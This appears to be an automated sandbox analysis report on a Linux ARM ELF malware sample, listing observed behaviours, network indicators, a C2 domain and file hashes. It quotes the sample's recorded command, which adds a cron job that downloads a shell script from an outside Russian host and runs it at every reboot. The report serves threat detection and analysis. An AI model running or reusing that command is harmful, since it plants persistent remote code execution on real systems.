Analysis Overview
SHA256
ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645
Threat Level: Shows suspicious behavior
The file ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Renames itself
Unexpected DNS network traffic destination
Enumerates running processes
Creates/modifies Cron job
Changes its process name
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-27 02:46
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-27 02:46
Reported
2024-10-27 02:49
Platform
debian9-armhf-20240611-en
Max time kernel
149s
Max time network
140s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/sh | N/A |
Renames itself
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 81.169.136.222 | N/A | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| File opened for modification | /var/spool/cron/crontabs/tmp.wNhaz5 | /usr/bin/crontab | N/A |
Enumerates running processes
Changes its process name
| Description | Indicator | Process | Target |
| Changes the process name, possibly in an attempt to hide itself | mini_httpd | /tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf | N/A |
Reads runtime system information
Processes
/tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf
[/tmp/ad47d5f8572aa78cc9d2ad9070372aeb0ee64d0011a615b36af8424b556cb645.elf]
/bin/sh
[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]
/usr/bin/crontab
[crontab -]
/usr/bin/crontab
[crontab -l]
Network
| Country | Destination | Domain | Proto |
| DE | 81.169.136.222:53 | kingstonwikkerink.dyn | udp |
| HK | 193.233.193.45:3869 | kingstonwikkerink.dyn | tcp |
Files
/var/spool/cron/crontabs/tmp.wNhaz5
| MD5 | a7092eb6aa79161f5a3758d751aae1b3 |
| SHA1 | 0f3e2f380e53ee3e3c412b75715939031fa40b04 |
| SHA256 | f6cd9800f1a8a1025b04977d62bcaf5f0d4642f8822ea73db53b5d986d576ac4 |
| SHA512 | 02ea889ecb85f5ee111b8c7cc9937423214e809d1edbe85cedb8984e9dbc0a2c49561ca9159d468216bb27617211d74b80f2aefab34b2199b7e007eb7b487ba0 |